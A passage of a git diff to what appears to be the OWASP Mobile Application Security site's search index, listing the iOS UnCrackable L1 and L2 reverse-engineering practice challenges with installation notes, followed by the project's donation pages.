"},{"location":"crackmes/iOS/","title":"iOS Crackmes","text":""},{"location":"crackmes/iOS/#ios-uncrackable-l1","title":"iOS UnCrackable L1","text":"A secret string is hidden somewhere in this binary. Find a way to extract it. The app will give you a hint when started.
Download
InstallationOpen the \"Device\" window in Xcode and drag the IPA file into the list below \"Installed Apps\".
Note: The IPA is signed with an Enterprise distribution certificate. You'll need to install the provisioning profile and trust the developer to run the app the \"normal\" way. Alternatively, re-sign the app with your own certificate, or run it on a jailbroken device (you'll want to do one of those anyway to crack it).
SPOILER (Solutions)By Bernhard Mueller
"},{"location":"crackmes/iOS/#ios-uncrackable-l2","title":"iOS UnCrackable L2","text":"This app holds a secret inside - and this time it won't be tampered with!
Hint: it is related to alcoholic beverages.
Download
InstallationOpen the \"Device\" window in Xcode and drag the IPA file into the list below \"Installed Apps\".
Note 1: The IPA is signed with an Enterprise distribution certificate. You'll need to install the provisioning profile and trust the developer to run the app the \"normal\" way. Alternatively, re-sign the app with your own certificate, or run it on a jailbroken device (you'll want to do one of those anyway to crack it).
Note 2: Due to its anti-tampering mechanisms the app won't run correctly if the main executable is modified and/or re-signed.
SPOILER (Solutions)By Bernhard Mueller
"},{"location":"donate/how_to_donate/","title":"How to Donate","text":"1. Make your Donation:
Click the button to make your donation directly in the official OWASP website:
Fill in the form and be sure to select the option \"Publicly list me as a supporter of OWASP Mobile Application Security\"
Make your Donation
2. Register your Donation Package (optional):
If your donation is above USD 500 you may opt-in for a Donation Package by registering it. We will then, together with the OWASP Foundation, verify and process it.
Register your Donation
"},{"location":"donate/packages/","title":"Donation Packages","text":"These types of public recognition shall be online no less than one year, or no less than the next major release, whichever is greater.
The Donation Packages have a maximum duration, once expired the logos will be removed and the donator will still be listed as a supporter on the project website, GitHub and in the printed and digital versions. This can be renewed anytime.
Good Samaritan (USD 500) Honorable Benefactor (USD 2,000 / 8 Available) God Mode Donator (USD 4,000 / 5 Available)
Please note that the OWASP Donation Policy has changed since 22-Sept-2020. All details can be found in OWASP Donations Policy page.
Contact us if you have any questions regarding your donation.
"}]} \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 182ad93967710393af17bacf29d17311f1ab8a98..e5597c45b1d5a83f5627eaefc2675f31c10c460c 100644 GIT binary patch delta 13 Ucmb=gXP58h;ApsRG?Bdm03C(|SpWb4 delta 13 Ucmb=gXP58h;9zJooXB1Q02u89hX4Qo